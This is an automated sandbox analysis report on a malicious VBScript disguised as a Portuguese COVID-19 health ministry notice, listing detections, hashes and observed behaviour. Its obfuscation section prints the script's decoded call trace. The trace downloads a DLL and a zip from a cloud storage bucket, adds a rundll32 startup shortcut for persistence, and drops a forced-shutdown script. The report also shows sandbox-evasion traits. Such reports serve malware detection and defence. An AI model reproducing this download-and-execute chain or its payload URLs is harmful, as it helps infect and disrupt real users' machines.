Analysis Report Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs

Overview

General Information

Sample Name: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs
Analysis ID: 338753
MD5: 462d612fcc6ce92ac4d1b58a27e4ecac
SHA1: 405633f2a4fe5b859ea9331a2276ebd494d39aa4
SHA256: 2bedcf94c9aea7b126f70169728f38678d615cdc26991c3b30628912eb2766d9

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Detected VMProtect packer
Machine Learning detection for dropped file
Potential evasive VBS script found (sleep loop)
Potential malicious VBS script found (has network functionality)
Windows Shell Script Host drops VBS files
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Stores files to the Windows start menu directory

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll Avira: detection malicious, Label: TR/Black.Gen2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll Avira: detection malicious, Label: TR/Black.Gen2
Multi AV Scanner detection for submitted file
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs Virustotal: Detection: 25% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll Joe Sandbox ML: detected

Networking:

barindex
Potential malicious VBS script found (has network functionality)
Source: Initial file: .write ZXDFVHIJXTXNZLNYYGEJOJNR.responseBody
Source: Initial file: .savetofile LJETZISNBGIJOFCVGWUIZSLT, 2
Source: Initial file: .write BFLCAJXFUHBOZFMBDCLJVIWJ.responseBody
Source: Initial file: .savetofile SASLHXXIDQYMUYFJXVRVATCD, 2
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox View IP Address: 8.8.8.8 8.8.8.8
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Source: wscript.exe, 00000001.00000002.1051218798.0000022DE835A000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: wscript.exe, 00000001.00000002.1048503032.0000022DE626D000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: https://pki.goog/repository/0
Source: wscript.exe, 00000001.00000002.1051098917.0000022DE824B000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/
Source: wscript.exe, 00000001.00000002.1051098917.0000022DE824B000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/kqKv)
Source: wscript.exe, wscript.exe, 00000001.00000002.1050701507.0000022DE8060000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip_)ik$
Source: wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zipjysv
Source: wscript.exe, wscript.exe, 00000001.00000002.1050701507.0000022DE8060000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll/
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dllenu

System Summary:

barindex
Detected VMProtect packer
Source: P-16-5[1].dll.1.dr Static PE information: .vmp0 and .vmp1 section names
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651
Java / VBScript file with very long strings (likely obfuscated code)
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs Initial sample: Strings found which are bigger than 50
PE file contains more sections than normal
Source: P-16-5[1].dll.1.dr Static PE information: Number of sections : 12 > 10
Source: classification engine Classification label: mal100.evad.winVBS@1/6@0/2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\eycptlzztfs.vbs Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs'
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs Virustotal: Detection: 25%
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell")WScript.Sleep(300000)Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_& "Primary=true")for each OpSys in OpSysSetretVal = OpSys.Win32Shutdown(6)nextIHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\eycptlzztfs.vbs", "true");ITextStream.Write("Set SFHISGAPSMULDDGFLMFHDFTG = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(300000)");ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _");ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_");ITextStream.Write("& "Primary=true")");ITextStream.Write("for each OpSys in OpSysSet");ITextStream.Write("retVal = OpSys.Win32Shutdown(6)");ITextStream.Write("next");ITextStream.Close();IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true");IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\24145662426947");IWshShell3.SpecialFolders("AppData");IWshShell3.SpecialFolders("AppData");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-16-5.dll", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll", "2");IHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("StartUp");IHost.CreateObject("WScript.Shell");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs .lnk");IWshShortcut.TargetPath("rundll32");IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll SFsb9V5o7LTfxDWhDoh");IWshShortcut.WindowStyle("1");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs");IWshShortcut.Save();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Roaming\eycptlzztfs.vbs");ITextStream.ReadAll();ITextStream.Close();IHost.Sleep("300000");ISWbemServicesEx.ExecQuery("select * from Win32_OperatingSystem where Primary=true");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01000001("6")
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
PE file contains sections with non-standard names
Source: P-16-5[1].dll.1.dr Static PE information: section name: .didata
Source: P-16-5[1].dll.1.dr Static PE information: section name: .vmp0
Source: P-16-5[1].dll.1.dr Static PE information: section name: .vmp1

Persistence and Installation Behavior:

barindex
Windows Shell Script Host drops VBS files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\eycptlzztfs.vbs Jump to behavior
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll Jump to dropped file

Boot Survival:

barindex
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs .lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs .lnk Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Potential evasive VBS script found (sleep loop)
Source: Initial file Initial file: CRZSCDGSMROZDYBDQERIQAJU.Write "WScript.Sleep(300000)" & vbCrLf
Source: C:\Windows\System32\wscript.exe Dropped file: WScript.Sleep(300000) Jump to dropped file
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll Jump to dropped file
Source: wscript.exe, 00000001.00000002.1051098917.0000022DE824B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW67
Source: wscript.exe, 00000001.00000002.1051409845.0000022DE8A10000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000002.1051409845.0000022DE8A10000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000001.00000002.1051409845.0000022DE8A10000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000001.00000002.1051409845.0000022DE8A10000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: P-16-5[1].dll.1.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 108.177.119.128 187 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 338753 Sample: Covid19-Min-Saude-Comuinica... Startdate: 12/01/2021 Architecture: WINDOWS Score: 100 22 Antivirus detection for dropped file 2->22 24 Multi AV Scanner detection for submitted file 2->24 26 Detected VMProtect packer 2->26 28 3 other signatures 2->28 5 wscript.exe 22 2->5         started        process3 dnsIp4 18 108.177.119.128 GOOGLEUS United States 5->18 20 8.8.8.8 GOOGLEUS United States 5->20 10 C:\...\uzunfcmnagjwjpnim5415442287920.dll, PE32 5->10 dropped 12 C:\Users\user\AppData\Local\...\P-16-5[1].dll, PE32 5->12 dropped 14 C:\Users\user\AppData\...\eycptlzztfs.vbs, ASCII 5->14 dropped 16 2 other malicious files 5->16 dropped 30 System process connects to network (likely due to code injection or exploit) 5->30 32 Benign windows process drops PE files 5->32 34 VBScript performs obfuscated calls to suspicious functions 5->34 36 2 other signatures 5->36 file5 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
8.8.8.8
unknown United States
15169 GOOGLEUS false
108.177.119.128
unknown United States
15169 GOOGLEUS true